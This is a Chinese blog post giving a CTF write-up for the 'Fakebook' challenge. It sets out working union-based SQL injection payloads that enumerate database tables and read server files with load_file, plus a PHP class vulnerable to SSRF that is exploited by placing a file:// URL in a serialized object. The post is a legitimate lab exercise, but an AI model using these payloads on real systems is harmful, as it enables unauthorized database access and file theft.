[网鼎杯 2018]Fakebook 1

最新推荐文章于 2024-04-24 17:24:28 发布

succ3

最新推荐文章于 2024-04-24 17:24:28 发布

阅读量534

点赞数

分类专栏： BUUCTF 文章标签： php 安全漏洞

本文链接：https://blog.csdn.net/shinygod/article/details/123152704

版权

BUUCTF 专栏收录该内容

131 篇文章 13 订阅

订阅专栏

知识点：联合注入，用/**/代替空格

预期解

注册一个然后，点击username，看到有个注入点no
在这里插入图片描述
堆叠注入没用

查列数
在这里插入图片描述
联合注入

爆库
no=-1 union/**/select 1,database(),3,4--+
爆表
no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'--+
爆字段
no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'--+

no=-1 union/**/select 1,data,3,4 from users–+
在这里插入图片描述
御剑扫到flag.php,显示robots.txt

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
    	// 创建一个cURL资源
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        //curl_setopt设置URL和相应的选项,模仿用户登录
        $output = curl_exec($ch);
        //curl_exec 抓取URL并把它传递给浏览器
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
         //curl_getinfo获取一个cURL连接资源句柄的信息，202，302，404....
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

在这里插入图片描述

这部分可能存在ssrf

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF是要进目标网站的内部系统。（因为他是从内部系统访问的，所有可以通过它攻击外网无法访问的内部系统，也就是把目标网站当中间人）

SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能，且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容，加载指定地址的图片，文档，等等。

举例： A网站，是一个所有人都可以访问的外网网站，B网站是一个他们内部的OA网站。
所以，我们普通用户只可以访问a网站，不能访问b网站。但是我们可以同过a网站做中间人，访问b网站，从而达到攻击b网站需求。

具体可参考SSRF漏洞是如何产生的？

我的理解是：由于它的服务端可以访问外网并或获取外网的数据，所以产生了ssrf

在这里插入图片描述
然后把序列化对象里的blog位置换成file:///var/www/html/flag.php,并把长度换为29，
最后把序列化对象放到select的4号位置，查询，因为blog在4号位置。
注（file://后面一条斜杠是/var…伪协议）
然后源码base64解码一下。
在这里插入图片描述

非预期解

在我们爆库完后，看一下数据库信息
no=-1 union/**/select 1,user(),3,4–+

在这里插入图片描述
root权限，有一个load_file()函数可以利用绝对路径去加载一个文件，于是我们利用一下
load_file(file_name):file_name是一个完整的路径，于是我们直接用var/www/html/flag.php路径去访问一下这个文件
no=-1 union/**/select 1,load_file("/var/www/html/flag.php"),3,4–+
在这里插入图片描述

参考

wow小华

succ3

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
[网鼎杯 2018]Fakebook 1

知识点：联合注入，用/**/代替空格目录预期解非预期解参考预期解注册一个然后，点击username，看到有个注入点no堆叠注入没用查列数联合注入爆库no=-1 union/**/select 1,database(),3,4--+爆表no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'--+爆字段no=
复制链接

扫一扫

专栏目录